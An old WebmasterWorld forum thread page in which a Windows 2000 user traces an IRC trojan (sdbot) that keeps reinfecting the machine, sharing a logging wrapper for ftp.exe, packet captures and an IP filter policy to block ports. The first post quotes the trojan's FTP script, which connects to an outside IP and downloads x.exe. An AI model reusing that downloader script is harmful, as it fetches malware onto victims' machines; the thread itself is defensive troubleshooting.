homepage Welcome to WebmasterWorld Guest from 54.234.42.16
register, login, search, subscribe, help, library, PubCon, announcements, recent posts, open posts,
Pubcon Website
Visit PubCon.com
Home / Forums Index / Microsoft / (deprecated) Microsoft Windows OS (XP/NT/Vista)
Forum Library : Charter : Moderators: bill

(deprecated) Microsoft Windows OS (XP/NT/Vista) Forum

This 33 message thread spans 2 pages: < < 33 ( 1 [2]     
How to Block IRC on Windows 2000?
Is there a way to turn off/ prohibit IRC on windows?
lmo4103




msg:3116267		 2:26 am on Oct 11, 2006 (gmt 0)

Trojan irc.sdbot2 keeps planting files x.exe. i, a in system32
Grissoft keeps catching it.

I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit

This on a fresh installation of windows 2000.
I have internet explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not topuching the pc, after a while it pops up again.

I just want to block unwanted files being deposited on my computer.

 

lmo4103




msg:3122423		 1:47 am on Oct 16, 2006 (gmt 0)

Throughout this thread, the "File and Printer Sharing for Microsoft Networks" has been un-checked for the dial-up connection, and there has not been any other network connection (net cable unplugged).
lmo4103




msg:3122429		 1:58 am on Oct 16, 2006 (gmt 0)

Deleted %windir%\system32\dllcache\ftp.exe
Renamed %windir%\system32\ftp.exe TO %windir%\system32\ftp_bak.exe
Created %windir%\system32\ftp.bat

.........................
%windir%\system32\ftp.bat
.........................
@echo off
echo %date:~4,10% %time:~0,8% %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 >> c:\foo.log

............
c:\foo.log
............
10/15/2006 1:09:29 ftp -n -s:i
10/15/2006 1:16:32 ftp -n -s:i
10/15/2006 1:30:58 ftp -n -s:i
10/15/2006 11:29:53 ftp -n -s:o
10/15/2006 11:32:55 ftp -n -s:o
10/15/2006 11:33:17 ftp -n -s:i
10/15/2006 11:33:42 ftp -n -s:o
10/15/2006 11:35:07 ftp -n -s:i
10/15/2006 17:11:16 ftp -n -s:i
10/15/2006 17:23:37 ftp -n -s:i
10/15/2006 21:48:45 ftp -n -s:i

...........
windump has
...........
21:48:28.387824 IP 221.208.208.90.32846 > walterh2.1027: UDP, length 459
21:48:28.387824 IP walterh2 > 221.208.208.90: ICMP walterh2 udp port 1027 unreachable, length 36

%windir%\system32\i appeared at 21:48:45

WHOIS Record For
221.208.208.90
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

WHOIS Record For
218.63.173.251
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU


lmo4103




msg:3124791		 10:33 pm on Oct 17, 2006 (gmt 0)

blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports

Control Panel -> Administrative Tools -> Local Security Policy -> IP Security Policies on Local Machine
.. Manage IP Filter Lists
.. Create IP Security Policy
.... Block inbound UDP 1025,1026,1027 and TCP 1025,445,135

Have not seen that sdbot for a while...

This 33 message thread spans 2 pages: < < 33 ( 1 [2]
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Microsoft / (deprecated) Microsoft Windows OS (XP/NT/Vista)
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
WebmasterWorld ® and PubCon ® are a Registered Trademarks of Pubcon Inc.
© Pubcon Inc. 1996-2012 all rights reserved